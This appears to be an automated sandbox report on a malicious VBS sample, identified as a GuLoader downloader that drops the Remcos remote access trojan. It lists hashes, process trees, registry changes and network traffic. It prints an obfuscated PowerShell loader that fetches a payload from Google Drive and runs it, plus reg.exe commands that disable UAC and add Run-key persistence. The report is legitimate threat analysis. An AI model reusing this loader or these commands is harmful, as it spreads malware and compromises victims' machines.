memory/1008-311-0x0000000076F80000-0x0000000077129000-memory.dmp

memory/1008-312-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1008-313-0x0000000077170000-0x0000000077246000-memory.dmp

memory/2956-314-0x0000000001850000-0x0000000004B0B000-memory.dmp

memory/2956-315-0x0000000076F80000-0x0000000077129000-memory.dmp

memory/1008-317-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/2956-318-0x0000000077170000-0x0000000077246000-memory.dmp

memory/2956-319-0x00000000771A6000-0x00000000771A7000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f5278624a2edc2e5913baea62d183bbb
SHA1 8c4c30835e01b72ba1a5f4da0dc66609d4df8eb4
SHA256 f04f8bb041521d898295f4df0bfc0589e5d3907606a1be78347373b71f28dd16
SHA512 d214cc183e2189cfe37e21f06f13f1eda9259df734c3e0abbea08943715ae1bd0a33c9c5bef3bd0872c2613a0b2841c97dfbddad7e337ac15922a118024a91cd

C:\Users\Admin\AppData\Local\Temp\Tar92EE.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2956-340-0x00000000007E0000-0x0000000001842000-memory.dmp

memory/2956-343-0x0000000077170000-0x0000000077246000-memory.dmp

memory/2956-342-0x0000000001850000-0x0000000004B0B000-memory.dmp

memory/1008-345-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/2280-346-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-25 01:33

Reported

2024-03-25 01:35

Platform

win10v2004-20240319-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1096 set thread context of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\windows mail\wab.exe N/A
Key created \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000_Classes\Local Settings C:\ProgramData\Remcos\remcos.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1096 wrote to memory of 3424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 3424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 2152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3424 wrote to memory of 2152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3424 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3440 wrote to memory of 908 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 908 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 908 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 908 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 908 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 908 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3440 wrote to memory of 1712 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1712 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1712 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3440 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3440 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 1712 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1712 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1712 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2228,i,17475224967547320003,13667387715861799238,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
NL 142.251.39.106:443 tcp
